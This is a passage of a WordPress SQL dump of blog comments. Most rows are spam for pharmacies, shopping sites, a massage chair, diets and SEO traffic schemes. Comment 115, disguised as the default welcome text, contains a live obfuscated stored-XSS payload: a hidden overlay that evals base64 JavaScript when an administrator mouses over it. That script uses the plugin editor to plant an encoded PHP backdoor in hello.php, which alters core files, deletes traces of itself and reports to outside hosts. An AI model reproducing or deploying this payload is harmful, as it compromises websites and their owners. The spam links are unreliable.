convenience of your home. \r\nBuy soma online no prescription \r\n<a href=\"http://www.purchase-online-easy.com/muscat-buy-and-sell.html\" rel=\"nofollow\">Muscat buy and sell tv</a> \r\nhttp://www.purchase-online-easy.com/buying-games-xbox-live-with-points.html \r\nThese are seen using in meetings, offices, educational centers, shopping malls, departmental stores and also in homes to present the credentials plus important things in a well thought out manner. By presenting the assignments or files using these, you can leave an everlasting impression over the viewers. Folders can be sent directly to the targeted clients in order to advertise your business or products so these are rendered as customizable so that you may alter the shape and size of these according to the usage. You can also design your custom folders by your own for example you can insert panels or pockets in these and you can also stick one end by using glue. A successful and widely using type of the folders is two pocket folders; it is clear from the name that these have two pockets or panels so benefit of having two pockets is that you can keep your documents separate from each other. If you want to keep credential plus USB, CD or any other devices with you then you can keep the credentials in one panel while the devices in the other one. \r\nSkateboard deck buying guide \r\n<a href=\"http://www.purchase-online-easy.com/what-groceries-buy-bulk.html\" rel=\"nofollow\">What groceries to buy in bulk</a> \r\nhttp://www.purchase-online-easy.com/payday-loans/hilton-head-island-hilton-head-girls-soccer.html \r\nOnline stores offer better and wider range of solutions, so this is where you need to shop for retail security systems. However, you must beware of illegitimate stores that often sell fake goods at significantly low prices. Though they may cost you very little, they can be easily tampered with, thus rendering them useless. Therefore, make sure that you shop for Alpha Security Products at a reputed online store only after making sure that their products are genuine.', 0, '0', 'Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1', '', 0, 0),
(108, 1, 'nuikoyhjq', 'herdarbb@hotmail.com', '', '120.37.208.146', '2014-08-04 15:10:28', '2014-08-04 15:10:28', '@@@ \r\nMore contentious is the subject of dilution. Now, for those who insist on using lump or granulated sugar, a dash of water is essential 鈥?you\'ll never dissolve it in alcohol alone. But if you\'re using syrup, it is unnecessary, particularly if you\'re muddling orange in there too, which will provide its own dilution (I firmly believe a splash of water brings out the flavour of most alcohols). Worst of all, however, are the recipes, such as Schumann\'s, <a href=\"http://www.juicemarket.info/welcome.aspx\" rel=\"nofollow\">True Religion Outlet Online</a> that top up the glass with soda or still water (which may also be the only sin ), killing its potent, boozy charms stone dead. DeGroff lists water or soda as optional extras, cautioning the reader to \"be careful not to drown the drink\". The best way to avoid that danger, in my opinion, is not to start down that road in the first place; if you want a long drink, have one.Ice, however, which Doudoroff lists <a href=\"http://www.styledepth.com/images/Login.asp\" rel=\"nofollow\">True Religion Jeans For Men</a> as optional because of its similarly, if slower, diluting qualities, is a must 鈥?as the temperature of the drink drops, its sweetness comes to the fore. If you have one of those giant <a href=\"http://janewenham-jones.com/fitflop-outlet.asp\" rel=\"nofollow\">Fitflop Sale</a> ice-cube moulds to impede the melting process, so much the better.GarnishA slice of orange and an extra cherry will make the drink look pretty, but I don\'t think it needs lemon, pineapple or any of the other garnishes that became popular in the drink\'s Draper-era dark days. This is a cocktail, as Victoria Moore observes, that should be drunk \"with gravitas\".The perfect old fashioned \r\n \r\nFor the sugar syrup (makes lots of syrup, but keeps almost indefinitely):100g brown sugar 100ml waterFor each drink:Bitters of your choice2 slices of orange2 maraschino cherries60ml bourbonIcePut the sugar and water in a small pan and bring to the boil, stirring to dissolve the sugar. Decant into a jar or bottle and allow to cool.Put a splash of syrup in a small rocks glass and add a <a href=\"http://janewenham-jones.com/beats-by-dre-studio.html\" rel=\"nofollow\">Beats By Dr Dre</a> couple of dashes of bitters. Put in a slice of orange and a cherry, then muddle against the bottom of the glass until the fruit is thoroughly mushed. Remove the orange and any big bits of cherry skin.Pour in the bourbon and stir well. Taste and add more syrup or bitters if you feel it lacking. Add ice in quantity, then garnish with the remaining fruit. Serve immediately and drink slowly.The old fashioned: are simple drinks always <a href=\"http://janewenham-jones.com/mybooks.php\" rel=\"nofollow\">Kate Spade Sale</a> best? Is a maraschino cherry sacrilege? And what\'s your default choice at the bar?', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0', '', 0, 0),
(109, 1, 'Соломон', 'dobrovvtsevdobrovvts@gmail.com', '', '94.153.9.222', '2014-08-31 12:24:51', '2014-08-31 12:24:51', 'Признаюсь честно, как все-таки я  я вас понимаю, насколько это все знакомо. \r\n \r\nВ недалеком прошлом я находился в такой досданой ситуации . \r\nЯ очень терпел адские боли. У меня чаще всего болела нога. Я  попробовал решить проблему без привлечения сторонних специалистов. Но позитивного влияния не стало.  Один мой  товарищ посоветовал  прекрасную  вещь. Я сам перед этим не задумывался о таком. Но  на данный момент я в курсе и не капли не жалею. \r\nМне  дали наводку приобрести массажное кресло . \r\nВ данную минуту я наверное самый  беззаботный человек  в нашем регионе. \r\n  У меня больше нет проблемы которые  меня пытали. Я как будто появился на свет заново . \r\nЧто самое замечательное  во всем этом, это то что я не отрываясь от работы \r\nмогу самостоятельно получать relax после которого уходят все боли. \r\nЕсли тебе интересно ,  ниже  поставил  линк на модель которую я  заказывал  себе. \r\nhttp://www.slims.ru/kreslo-massazhnoe/us_medica/621966/  \r\n \r\n \r\nhttp://img32.ru/uploads/13344167342513410.jpg \r\n \r\nhttp://img32.ru/uploads/17737217612048062.jpg \r\n \r\nhttp://img32.ru/uploads/70738887215445913.jpg \r\n \r\nhttp://img32.ru/uploads/31787769750415378.jpg \r\n \r\nВ общем здесь очень большой выбор кресел, возможно ты найдешь другую модель  лично под себя \r\nУспехов в лечение. Береги свое время и нервы', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.16', '', 0, 0),
(110, 1, 'Michaelmig', 'semenow.pet2015@yandex.com', 'http://www.meksikabiber.com/corn-free-diet.html', '95.139.116.91', '2014-10-09 17:39:32', '2014-10-09 17:39:32', 'Low calorie chicken recipesWhat is taurineFoods to eat to gain weighthttp://www.meksikabiber.com/harcombe-diet-phase-1.htmlWomen bodybuilding dietWeight loss during pregnancyHealthy fish recipes <a href=\"http://www.meksikabiber.com/having-a-baby.html\" rel=\"nofollow\">Having a baby</a> Healthy vegetable soupFat burning soup recipesGluten free desserts \r\nHow to do an elimination dietCauses of addJewish dietary lawshttp://www.meksikabiber.com/low-carb-grocery-list.htmlBest tips to lose weightWeight loss waterHow to lose weight in 2 months <a href=\"http://www.meksikabiber.com/lacto-ovo-vegetarian-diet.html\" rel=\"nofollow\">Lacto ovo vegetarian diet</a> Constipation and abdominal painPaleo diet eggsSigns of gestational diabetes', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', '', 0, 0),
(111, 1, 'Garrettpype', 'pokupatel.sfer@yandex.ru', 'http://pokupkicherezinternet.ru/%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%B9-%D1%81%D0%BC%D0%B0%D1%80%D1%82%D1%84%D0%BE%D0%BD-%D0%B4%D0%BE-10000-%D1%80%D1%83%D0%B1%D0%BB%D0%B5%D0%B9-2014-%D0%B3%D0%BE%D0%B4%D0', '95.139.116.91', '2014-11-16 21:20:07', '2014-11-16 21:20:07', 'Собственно задание в названии темы. \r\nКоторый смарт довольно лучшим после 2014 год? \r\nСогласно подобным статьям http://pokupkicherezinternet.ru/%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%B9-%D1%81%D0%BC%D0%B0%D1%80%D1%82%D1%84%D0%BE%D0%BD-%D0%B4%D0%BE-10000-%D1%80%D1%83%D0%B1%D0%BB%D0%B5%D0%B9-2014-%D0%B3%D0%BE%D0%B4%D0%B0.html \r\nпервоклассный смартфон до 10000 рублей 2014 возраст определен. \r\nА каково ваше мнение? Какой смартфон можете назватьлучший смартфон перед 10000 рублей 2014 года именно вы? \r\nвопрос к сожалению не праздный. Сам планирую покупку в ближуйщее пора и совершенно казаться не могу определиться. \r\nБуду рад вашей помощи. Лениться опираться исключительно для такие статьи. \r\nСпасибо! \r\n<a href=\"http://pokupkicherezinternet.ru/%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%B9-%D1%81%D0%BC%D0%B0%D1%80%D1%82%D1%84%D0%BE%D0%BD-%D0%B4%D0%BE-10000-%D1%80%D1%83%D0%B1%D0%BB%D0%B5%D0%B9-2014-%D0%B3%D0%BE%D0%B4%D0%B0.html\" rel=\"nofollow\">лучший смартфон до 10000 рублей 2014 года</a> \r\n<a href=\"http://pokupkicherezinternet.ru/%D0%BB%D1%83%D1%87%D1%88%D0%B8%D0%B9-%D1%81%D0%BC%D0%B0%D1%80%D1%82%D1%84%D0%BE%D0%BD-%D0%B4%D0%BE-10000-%D1%80%D1%83%D0%B1%D0%BB%D0%B5%D0%B9-2014-%D0%B3%D0%BE%D0%B4%D0%B0.html\" rel=\"nofollow\">лучший смартфон до 10000 рублей 2014 года</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', '', 0, 0),
(112, 1, 'JessicavonO', 'jessicasenson2296@hotmail.com', 'http://next-gen-traffic.net', '178.137.84.124', '2014-11-20 12:45:56', '2014-11-20 12:45:56', 'hello www.crosstrainingcenter.be admin have you wondered what’s the secret how big company websites get massive targeted traffic and exposure in Google 1st page results for the biggest and toughest keywords? \r\nAnswer is simple links, but only quality links which counts as votes for your site giving Google no choice but to shoot your site rankings to #1 results so your customers can see your site at the top of Google search results.  Today is your lucky day because I’m going to reveal you secret resource of best of the best links from 500’000 website network! Yes that’s correct not some tiny 500 site network but half a million. \r\n*Links from real established, authority English actual PR pages with low outbound links max 10 \r\n* Skyrocket your website rankings for your website related keyword and get massive laser targeted traffic, customers and $$$ in your bank account. Forget about thousands of crap directory and forum links which will do nothing bust just hurt your website rankings. Get the real deal at http://next-gen-traffic.net Yes that’s the future of link building \r\nAfter my site is now at #1 position in Google I think http://next-gen-traffic.net is the game changer in seo world! \r\nYour friend Jessica.', 0, '0', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.77', '', 0, 0),
(113, 1, 'MikeOr', 'mike_omike@aol.com', 'http://mass-auto-traffic.net/download.html', '178.137.84.124', '2014-11-22 18:17:48', '2014-11-22 18:17:48', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://mass-auto-traffic.net/download.html \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://mass-auto-traffic.net/download.html \r\nBest regards \r\nYour old friend Mike', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 OPR/23.0.1522.77', '', 0, 0),
(114, 1, 'Sherry', 'kavzngwkqme@gmail.com', 'http://tf3.info/5w', '192.69.255.223', '2014-12-01 16:34:15', '2014-12-01 16:34:15', 'Hi, my name is Sherry and I am the sales manager at StarSEO Marketing. I was just looking at your site and see that your site has the potential to become very popular. I just want to tell you, In case you didn\'t already know... There is a website network which already has more than 16 million users, and most of the users are looking for niches like yours. By getting your website on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can read more about it here: http://esyok.com/shirt/3z - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the service I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular blogs are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Read more here: http://esyok.com/shirt/3z', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0);
INSERT INTO `www2_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(115, 1, 'Wasia', 'aaa@aaa.com', '', '182.50.130.176', '2014-12-04 17:22:51', '2014-12-04 17:22:51', 'Welcome to WordPress. This is your first post. [<a title=\"]\" rel=\"nofollow\"></a>[\\\" <!-- style=\\\'position:fixed;top:0px;left:0px;width:6000px;height:6000px;color:transparent;z-index:999999999\\\' onmouseover=\"eval(atob(\\\'dmFyIHggPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiYSIpOwp2YXIgaTsKZm9yIChpID0gMDsgaSA8IHgubGVuZ3RoOyBpKyspIHsKICAgIGlmKHhbaV0uc3R5bGUud2lkdGggPT0gIjYwMDBweCIpe3hbaV0uc3R5bGUuZGlzcGxheT0ibm9uZSI7fQp9Cgp2YXIgZWwgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKZWwuaWQgPSAnaWZyYW1lMjInOwplbC5zdHlsZS5kaXNwbGF5ID0gImZpeGVkIjsKZWwuc3R5bGUudG9wPScxMDAwMHB4JzsKZWwuc3R5bGUubGVmdD0nMTAwMDBweCc7CmVsLnN0eWxlLndpZHRoID0gIjUwMHB4IjsKZWwuc3R5bGUuaGVpZ2h0ID0gIjUwMHB4IjsKZWwuc3JjID0gInBsdWdpbi1lZGl0b3IucGhwP2ZpbGU9aGVsbG8ucGhwJnBsdWdpbj1oZWxsby5waHAiOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGVsKTsKZWwub25sb2FkID0gaHV5OwoKZnVuY3Rpb24gZ2V0SWZyYW1lRG9jdW1lbnQoaWZyYW1lTm9kZSkgewogIGlmIChpZnJhbWVOb2RlLmNvbnRlbnREb2N1bWVudCkgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudERvY3VtZW50CiAgaWYgKGlmcmFtZU5vZGUuY29udGVudFdpbmRvdykgcmV0dXJuIGlmcmFtZU5vZGUuY29udGVudFdpbmRvdy5kb2N1bWVudAogIHJldHVybiBpZnJhbWVOb2RlLmRvY3VtZW50Cn0KCmZ1bmN0aW9uIGh1eSgpewp2YXIgenp6ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2lmcmFtZTIyJyk7CnZhciBoaGggPSBnZXRJZnJhbWVEb2N1bWVudCh6enopOwppZiAoaGhoLmdldEVsZW1lbnRCeUlkKCJuZXdjb250ZW50IikudmFsdWUuaW5kZXhPZigiNDlkZTM3MTUxMWMxZGUzYmRlMzRiMDEwOGVjN2YxMjkiKSA9PSAtMSkgewpoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZSA9IGF0b2IoIlBEOXdhSEFLQ21aMWJtTjBhVzl1SUZWdWIxOWxibU52WkdVb0pGTjBjbWx1WnlrS2V3b2dJQ0FnSkZOaGJIUTlKMlJqTlhBNVpFOXdRbU1uT3dvZ0lDQWdKRk4wY2t4bGJpQTlJSE4wY214bGJpZ2tVM1J5YVc1bktUc0tJQ0FnSUNSVFpYRWdQU0FuUkUxRlpqVklXblZRY1NjN0NpQWdJQ0FrUjJGdGJXRWdQU0FuSnpzS0lDQWdJSGRvYVd4bElDaHpkSEpzWlc0b0pFZGhiVzFoS1R3a1UzUnlUR1Z1S1FvZ0lDQWdld29nSUNBZ0lDQWdJQ1JUWlhFZ1BTQndZV05yS0NKSUtpSXNjMmhoTVNna1IyRnRiV0V1SkZObGNTNGtVMkZzZENrcE93b2dJQ0FnSUNBZ0lDUkhZVzF0WVM0OWMzVmljM1J5S0NSVFpYRXNNQ3c0S1RzS0lDQWdJSDBLQ2lBZ0lDQnlaWFIxY200Z1ltRnpaVFkwWDJWdVkyOWtaU2drVTNSeWFXNW5YaVJIWVcxdFlTazdDbjBLQ21aMWJtTjBhVzl1SUhKbGNHOXlkQ2drY21Oa0tYc0tKSEpsWTJsMlpYSnpXMTBnUFNBbmFIUjBjRG92TDJ4cFoyaDBhRzkxYzJVdFkyaDFjbU5vTG1OdkxuVnJMM2R3TFdOdmJuUmxiblF2YkdGdVozVmhaMlZ6TDJsMEwybDBMbkJvY0NjN0NpUnlaV05wZG1WeWMxdGRJRDBnSjJoMGRIQTZMeTkzZDNjdVluVnlaV0YxZEdGaGJIWmhjM1F1Ym13dmQzQXRZMjl1ZEdWdWRDOW5ZV3hzWlhKNUwyaGxZV1JsY2k5MUwzQnBZeTV3YUhBbk93b2tjbVZqYVhabGNuTmJYU0E5SUNkb2RIUndPaTh2ZDJWemRHSjFjbmxwYm5SbGNtbHZjbk11WTI4dWRXc3ZkM0F0WTI5dWRHVnVkQzkxY0d4dllXUnpMekl3TVRRdk1URXZhVzFuTG5Cb2NDYzdDaVJ5WldOcGRtVnljMXRkSUQwZ0oyaDBkSEE2THk5aWNtbHpkSEpoYm1RdWMyVXZhR1Z0YzJsa1lTOTBiWEF2YVcxbkxuQm9jQ2M3Q2lSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OTBhR2xqYTI1bGMzTndiR0Z1WlhJdWIzSm5MM2R3TFdOdmJuUmxiblF2Y0d4MVoybHVjeTloYTJsemJXVjBMM1V2Y0dsekxuQm9jQ2M3Q2lSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OTBabkJoWTJzeU5DNXBibVp2TDNkd0xXTnZiblJsYm5RdmNHeDFaMmx1Y3k5aGMyc3ZhVzVrWlhndWNHaHdKenNLSkhKbFkybDJaWEp6VzEwZ1BTQW5hSFIwY0RvdkwzQnNZVzVsYkc5allYUnBiMjV6TG1OdmJTOWxlSFJsYm1SemRHRjBjeTkxTDJsdUxuQm9jQ2M3Q2lSeVpXTnBkbVZ5YzF0ZElEMGdKMmgwZEhBNkx5OWhZMk5wYjI1bGJuSmxaR05oYm1GeWFXRnpMbU52YlM5cGJtTXZkQzlwYm1SbGVDNXdhSEFuT3dvS0Nnb0tKSG9nUFNCemRISmZjbVZ3YkdGalpTZ25kM0F0WTI5dWRHVnVkQzl3YkhWbmFXNXpMMmhsYkd4dkxuQm9jQ2NzSnljc0pGOVRSVkpXUlZKYklsSkZVVlZGVTFSZlZWSkpJbDBwT3dva2NtVndiM0owSUQwZ1ZXNXZYMlZ1WTI5a1pTZ2tYMU5GVWxaRlVsc2lTRlJVVUY5SVQxTlVJbDB1SUNSNklDNGdKM3duSUM0Z0pISmpaQ2s3Q25Ob2RXWm1iR1VvSkhKbFkybDJaWEp6S1RzS1ptOXlaV0ZqYUNna2NtVmphWFpsY25NZ1lYTWdKSFFwZXdwbFkyaHZJQ2M4YVcxbklIZHBaSFJvUFRFZ2FHVnBaMmgwUFRFZ2MzSmpQU0luSUM0a2RDQXVJQ2MvWkdGMFlUMG5JQzRrY21Wd2IzSjBMaWNpUGljN0NuMEtmUW9LWm5WdVkzUnBiMjRnY21WdGIzWmxYMk52YlcxbGJuUW9LWHNLYVc1amJIVmtaVjl2Ym1ObEtDY3VMaTh1TGk5M2NDMWpiMjVtYVdjdWNHaHdKeWs3Q2dva1kyOXVJRDBnYlhsemNXeGZZMjl1Ym1WamRDaEVRbDlJVDFOVUxFUkNYMVZUUlZJc1JFSmZVRUZUVTFkUFVrUXBPd3B0ZVhOeGJGOXpaV3hsWTNSZlpHSW9SRUpmVGtGTlJTd2dKR052YmlrN0Nnb2tlbUZ3Y205eklEMGdKMlJsYkdWMFpTQm1jbTl0SUNjZ0xpQWtkR0ZpYkdWZmNISmxabWw0SUM0Z0oyTnZiVzFsYm5SeklIZG9aWEpsSUdOdmJXMWxiblJmWTI5dWRHVnVkQ0JzYVd0bElGd25KV0YwYjJJbFhDYzdKenNLSkhJZ1BTQnRlWE54YkY5eGRXVnllU2drZW1Gd2NtOXpLVHNLYlhsemNXeGZZMnh2YzJVb0pHTnZiaWs3Q24wS0NtWjFibU4wYVc5dUlIQmhkR05vWDNkd0tDbDdDaVJtYm1GdFpTQTlJQ2N1TGk4dUxpOTNjQzFqYjIxdFpXNTBjeTF3YjNOMExuQm9jQ2M3Q21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JtYm1GdFpTa3Bld29rZENBOUlDYzhQM0JvY0NCa2FXVW9LVHNnUHo0bklDNGdVRWhRWDBWUFREc0tDaVIwYVcxbElEMGdabWxzWlcxMGFXMWxLQ1JtYm1GdFpTazdDaVIzY21sMElEMGdabUZzYzJVN0NncHBaaUFvSVdselgzZHlhWFJoWW14bEtDUm1ibUZ0WlNrcGV3b2tjR1Z5YlNBOUlITjFZbk4wY2loemNISnBiblJtS0NjbGJ5Y3NJR1pwYkdWd1pYSnRjeWdrWm01aGJXVXBLU3dnTFRRcE93cEFZMmh0YjJRb0pHWnVZVzFsTERBMk5qWXBPd29rZDNKcGRDQTlJSFJ5ZFdVN0NuMEtDbU5zWldGeWMzUmhkR05oWTJobEtDazdDbWxtSUNocGMxOTNjbWwwWVdKc1pTZ2tabTVoYldVcEtYc0tKSFJ0Y0NBOUlFQm1hV3hsWDJkbGRGOWpiMjUwWlc1MGN5Z2tabTVoYldVcE93b2tkRzF3SUQwZ0pIUWdMaUFrZEcxd093cDlDbWxtSUNoemRISnNaVzRvSkhSdGNDa2dQaUF4TUNsN0Nnb2taaUE5SUdadmNHVnVLQ1JtYm1GdFpTd2lkeUlwT3dwbWNIVjBjeWdrWml3a2RHMXdLVHNLWm1Oc2IzTmxLQ1JtS1RzS2ZRb0tZMnhsWVhKemRHRjBZMkZqYUdVb0tUc0tDbWxtSUNna2QzSnBkQ2w3Q21admNpZ2thVDF6ZEhKc1pXNG9KSEJsY20wcExURTdKR2srUFRBN0xTMGthU2w3Q2lSd1pYSnRjeUFyUFNBb2FXNTBLU1J3WlhKdFd5UnBYU3B3YjNjb09Dd2dLSE4wY214bGJpZ2tjR1Z5YlNrdEpHa3RNU2twT3dwOUNrQmphRzF2WkNna1ptNWhiV1VzSkhCbGNtMXpLVHNLZlFvS1FIUnZkV05vS0NSbWJtRnRaU3drZEdsdFpTazdDbjBLZlFvS1puVnVZM1JwYjI0Z2MyVnNabDl5WlcxdmRtVW9LWHNLSkdadVlXMWxJRDBnWDE5R1NVeEZYMTg3Q2lSMGFXMWxJRDBnWm1sc1pXMTBhVzFsS0NSbWJtRnRaU2s3Q2lSM2NtbDBJRDBnWm1Gc2MyVTdDZ3BwWmlBb0lXbHpYM2R5YVhSaFlteGxLQ1JtYm1GdFpTa3Bld29rY0dWeWJTQTlJSE4xWW5OMGNpaHpjSEpwYm5SbUtDY2xieWNzSUdacGJHVndaWEp0Y3lna1ptNWhiV1VwS1N3Z0xUUXBPd3BBWTJodGIyUW9KR1p1WVcxbExEQTJOallwT3dva2QzSnBkQ0E5SUhSeWRXVTdDbjBLQ21Oc1pXRnljM1JoZEdOaFkyaGxLQ2s3Q21sbUlDaHBjMTkzY21sMFlXSnNaU2drWm01aGJXVXBLWHNLSkhSdGNDQTlJRUJtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdrWm01aGJXVXBPd29LSkhCdmN5QTlJSE4wY25CdmN5Z2tkRzF3TENjME9XUmxNemN4TlRFeFl6RmtaVE5pSnk0blpHVXpOR0l3TVRBNFpXTTNaakV5T1NjcE93b2tkRzF3SUQwZ2MzVmljM1J5S0NSMGJYQXNKSEJ2Y3lBcklETXlLVHNLQ21sbUlDaHpkSEpzWlc0b0pIUnRjQ2tnUGlBeE1DbDdDZ29rWmlBOUlHWnZjR1Z1S0NSbWJtRnRaU3dpZHlJcE93cG1jSFYwY3lna1ppd2tkRzF3S1RzS1ptTnNiM05sS0NSbUtUc0tmUW9LWTJ4bFlYSnpkR0YwWTJGamFHVW9LVHNLQ21sbUlDZ2tkM0pwZENsN0NtWnZjaWdrYVQxemRISnNaVzRvSkhCbGNtMHBMVEU3SkdrK1BUQTdMUzBrYVNsN0NpUndaWEp0Y3lBclBTQW9hVzUwS1NSd1pYSnRXeVJwWFNwd2IzY29PQ3dnS0hOMGNteGxiaWdrY0dWeWJTa3RKR2t0TVNrcE93cDlDa0JqYUcxdlpDZ2tabTVoYldVc0pIQmxjbTF6S1RzS2ZRb0tRSFJ2ZFdOb0tDUm1ibUZ0WlN3a2RHbHRaU2s3Q24wS2ZRb0tKR1p1WVcxbElEMGdKeTR1THk0dUwzZHdMV052Ym1acFp5NXdhSEFuT3dvS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdadVlXMWxLU2w3SUFvS0pISmpaQ0FnUFNCdFpEVW9KRjlUUlZKV1JWSmJJa2hVVkZCZlNFOVRWQ0pkTGlSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFM1eVlXNWtLREFzTVRBd01EQXBLVHNLQ2lSMElEMGdKMmxtSUNocGMzTmxkQ2drWDFKRlVWVkZVMVJiWENkR1NVeEZYQ2RkS1NsN0pGOUdTVXhGSUQwZ0pGOVNSVkZWUlZOVVcxd25KeTRrY21Oa0xpZGNKMTBvWENja1gxd25MQ1JmVWtWUlZVVlRWRnRjSjBaSlRFVmNKMTB1WENjb0pGOHBPMXduS1RzZ0pGOUdTVXhGS0hOMGNtbHdjMnhoYzJobGN5Z2tYMUpGVVZWRlUxUmJYQ2RJVDFOVVhDZGRLU2s3ZlNjN0Nnb2tkR2x0WlNBOUlHWnBiR1Z0ZEdsdFpTZ2tabTVoYldVcE93b2tjMmw2WlNBOUlHWnBiR1Z6YVhwbEtDUm1ibUZ0WlNrN0NpUjNjbWwwSUQwZ1ptRnNjMlU3Q2dwcFppQW9JV2x6WDNkeWFYUmhZbXhsS0NSbWJtRnRaU2twZXdva2NHVnliU0E5SUhOMVluTjBjaWh6Y0hKcGJuUm1LQ2NsYnljc0lHWnBiR1Z3WlhKdGN5Z2tabTVoYldVcEtTd2dMVFFwT3dwQVkyaHRiMlFvSkdadVlXMWxMREEyTmpZcE93b2tkM0pwZENBOUlIUnlkV1U3Q24wS0NtTnNaV0Z5YzNSaGRHTmhZMmhsS0NrN0NtbG1JQ2hwYzE5M2NtbDBZV0pzWlNna1ptNWhiV1VwS1hzS0pIUnRjQ0E5SUVCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lna1ptNWhiV1VwT3dvS0pIUnRjQ0E5SUhOMGNsOXlaWEJzWVdObEtDY2tkR0ZpYkdWZmNISmxabWw0Snl3Z0pIUWdMaUJRU0ZCZlJVOU1JQzRnSnlSMFlXSnNaVjl3Y21WbWFYZ25MQ0FrZEcxd0tUc0thV1lnS0hOMGNteGxiaWdrZEcxd0tTQStJREV3S1hzS0NpUm1JRDBnWm05d1pXNG9KR1p1WVcxbExDSjNJaWs3Q21ad2RYUnpLQ1JtTENSMGJYQXBPd3BtWTJ4dmMyVW9KR1lwT3dwOUNncGpiR1ZoY25OMFlYUmpZV05vWlNncE93b0thV1lnS0NSM2NtbDBLWHNLWm05eUtDUnBQWE4wY214bGJpZ2tjR1Z5YlNrdE1Uc2thVDQ5TURzdExTUnBLWHNLSkhCbGNtMXpJQ3M5SUNocGJuUXBKSEJsY20xYkpHbGRLbkJ2ZHlnNExDQW9jM1J5YkdWdUtDUndaWEp0S1Mwa2FTMHhLU2s3Q24wS1FHTm9iVzlrS0NSbWJtRnRaU3drY0dWeWJYTXBPd3A5Q2dwQWRHOTFZMmdvSkdadVlXMWxMQ1IwYVcxbEtUc0tmUW9LWTJ4bFlYSnpkR0YwWTJGamFHVW9LVHNLYVdZb0pITnBlbVVnSVQwOUlHWnBiR1Z6YVhwbEtDUm1ibUZ0WlNrcGV3cHlaWEJ2Y25Rb0pISmpaQ2s3Q24wS2ZRb0tjbVZ0YjNabFgyTnZiVzFsYm5Rb0tUc0tjR0YwWTJoZmQzQW9LVHNLYzJWc1psOXlaVzF2ZG1Vb0tUc0tDajgrQ2k4dk5EbGtaVE0zTVRVeE1XTXhaR1V6WW1SbE16UmlNREV3T0dWak4yWXhNams9IikgKyBoaGguZ2V0RWxlbWVudEJ5SWQoIm5ld2NvbnRlbnQiKS52YWx1ZTsKaGhoLmdldEVsZW1lbnRCeUlkKCJzdWJtaXQiKS5jbGljayggKTsKfQplbHNlIHsKenp6LnNyYyA9ICcuLi93cC1jb250ZW50L3BsdWdpbnMvaGVsbG8ucGhwJzsKfQp9\\\'))\" &gt; --><a></a>] Edit or delete it, then start blogging!', 0, '0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', '', 0, 0),
(116, 1, 'Anne', 'cmhifu@aol.com', 'http://qa.juststicky.com/yourls/275f', '192.69.255.179', '2014-12-19 23:16:40', '2014-12-19 23:16:40', 'You need targeted traffic to your Hello world! | Cross Training Center (Namur - Limelette) website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://qa.juststicky.com/yourls/275f', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
